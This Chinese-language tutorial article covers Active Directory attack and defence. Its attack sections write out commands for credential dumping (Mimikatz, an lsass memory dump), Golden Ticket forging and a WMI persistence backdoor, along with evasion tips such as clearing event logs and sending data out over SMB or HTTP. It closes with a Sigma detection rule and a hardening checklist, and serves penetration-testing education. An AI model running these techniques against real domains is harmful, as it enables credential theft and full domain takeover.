Active Directory域渗透技术：攻防实战与防御体系构建

硅谷IT胖子

1. 域渗透技术全景解析：从基础到实战的企业安全攻防手册

在当今企业安全架构中，Active Directory（AD）域环境如同数字王国的中枢神经系统。作为从业十五年的安全顾问，我见证过太多企业因为域控失守而导致全线溃败的案例。域渗透技术既是攻击者的"核武器"，也是防御者的必修课——只有深入理解攻击手法，才能构建有效的防御体系。

2. 域环境基础架构剖析

2.1 Active Directory核心组件

AD域的本质是一个分布式数据库，其核心架构包含三个关键层：

数据层：NTDS.dit文件存储所有对象数据，包括用户账户、计算机对象、组策略等
协议层：Kerberos（默认）和NTLM两种认证协议构成安全基石
服务层：域控制器(DC)、全局编录(GC)、DNS等服务协同工作

典型的企业域架构中，管理员往往忽略的脆弱点包括：

默认的"Everyone"组权限配置
陈旧的Service Principal Name(SPN)注册
过度宽松的域信任关系

2.2 域渗透的黄金法则

通过数百次渗透测试的实战验证，我总结出域渗透的"3A法则"：

Access（初始访问）：通过钓鱼邮件、漏洞利用或配置错误获取立足点
Advance（权限提升）：利用本地提权漏洞或凭证转储获取更高权限
Admin（域控接管）：通过横向移动最终控制域控制器

关键洞察：现代企业防御体系最薄弱的环节往往不是技术漏洞，而是过度复杂的权限分配和缺乏监控的服务账户。

3. 信息收集的艺术与科学

3.1 被动信息收集技术

在真实攻防演练中，我通常会先采用非侵入式侦察：

powershell复制# 获取域基础信息
nltest /domain_trusts
nltest /dclist:域名

# 查询站点和子网拓扑
nltest /dsgetsite
nltest /dsgetsubnet

这些命令不会触发大多数SIEM系统的警报，却能获取域结构、站点划分等关键信息。

3.2 主动侦察技术详解

当需要深度侦察时，PowerView脚本是首选工具。以下是我在实战中优化的查询组合：

powershell复制# 发现高价值目标
Get-NetUser -SPN | select samaccountname,serviceprincipalname
Get-NetComputer -OperatingSystem "*server*" -FullData

# 定位管理员会话
Invoke-UserHunter -Stealth -CheckAccess

特别注意：

避免频繁查询导致账号被锁定
使用LDAP过滤器缩小查询范围（如lastLogonTime>90天）
优先收集OU结构和组策略信息

4. 凭证攻击实战手册

4.1 内存凭证提取进阶技巧

Mimikatz的使用已广为人知，但高级攻击者会采用更隐蔽的方式：

powershell复制# 无文件内存加载
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'

# 仅提取特定进程内存
procdump.exe -ma lsass.exe lsass.dmp

防御规避要点：

使用Process Hollowing技术注入合法进程
通过SMB或HTTP外传数据而非直接下载
清除Windows事件日志（EventLog）

4.2 Kerberos协议攻击全解

黄金票据(Golden Ticket)攻击的完整流程：

获取krbtgt账户的NTLM Hash（通常需要域管理员权限）

伪造TGT票据：

bash复制mimikatz # kerberos::golden /user:Administrator /domain:corp.com /sid:S-1-5-21-... /krbtgt:hash /ptt

使用票据访问域资源：
```
powershell复制dir \\dc01\c$
```

白银票据(Silver Ticket)的特殊应用场景：

针对特定服务（如SQL Server、Exchange）
不需要与KDC交互，更难检测

5. 横向移动的三十六计

5.1 基于WMI的隐蔽渗透

WMI（Windows Management Instrumentation）是内网渗透的瑞士军刀：

powershell复制# 远程命令执行
Invoke-WmiMethod -ComputerName PC01 -Class Win32_Process -Name Create -ArgumentList "calc.exe"

# 持久化后门
$filterArgs = @{EventNamespace='root\cimv2'; Name='BotFilter82'}
$consumerArgs = @{Name='BotConsumer82'; CommandLineTemplate="cmd.exe /c evil.exe"}

防御检测要点：

监控异常的WMI事件订阅
限制普通用户的WMI权限
检查WinMgmt日志中的可疑操作

5.2 基于委派的特权升级

约束委派(Constrained Delegation)滥用实战：

查找配置了委派的服务账户：

powershell复制Get-DomainComputer -TrustedToAuth | Select-Object name,msds-allowedtodelegateto

获取服务账户的凭证（通过Kerberoasting攻击）
伪造服务票据访问目标资源

非约束委派(Unconstrained Delegation)更危险：

可捕获域管理员的TGT票据
常见于域控制器和关键服务器

6. 防御体系构建指南

6.1 检测工程实践

基于ATT&CK框架构建检测规则示例：

yaml复制# Sigma规则示例：可疑的Kerberos票据请求
title: Suspicious Kerberos Ticket Request
description: Detects requests for Kerberos tickets with abnormal encryption types
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 4768
        TicketEncryptionType: 
            - "0x17"  # RC4
            - "0x18"  # DES
    condition: selection
falsepositives:
    - Legacy systems using weak encryption
level: high

6.2 加固配置清单

域控制器必须实施的10项关键配置：

启用LSA保护（RunAsPPL）
限制NTLM使用（网络安全：限制NTLM）
配置Kerberos Armoring
启用Windows Defender攻击面减少规则
部署Credential Guard
审核敏感账户的登录行为
限制域管理员登录范围
定期轮换krbtgt账户密码
禁用不必要的服务账户委派
实施网络分段隔离域控制器

7. 红蓝对抗实战案例

在某次金融行业渗透测试中，我们通过以下路径突破防线：

初始访问：利用过期的Web应用漏洞上传webshell
本地提权：通过未修补的打印机服务漏洞获取SYSTEM权限
凭证获取：从内存中转储多个服务账户凭证
横向移动：利用SQL Server链接服务器功能跳转到业务区
域控接管：通过PetitPotam漏洞强制域控制器认证

整个攻击链中，最关键的突破点是发现某台服务器配置了非约束委派，使我们能够截获域管理员的TGT票据。这个案例凸显了服务账户配置审核的重要性。

8. 持续学习路径建议

域渗透技术的深度和广度都在不断扩展，建议按照以下路径系统学习：

基础阶段（1-3个月）：
- 掌握Windows安全体系（SAM、LSASS、DPAPI）
- 熟悉Active Directory基础管理
- 学习PowerShell基础
中级阶段（3-6个月）：
- 深入Kerberos/NTLM协议细节
- 演练常见攻击工具（Mimikatz、BloodHound等）
- 理解组策略和安全标识符(SID)
高级阶段（6个月+）：
- 研究AD CS（证书服务）攻击面
- 分析微软补丁中的安全更新
- 参与CTF比赛和红队演练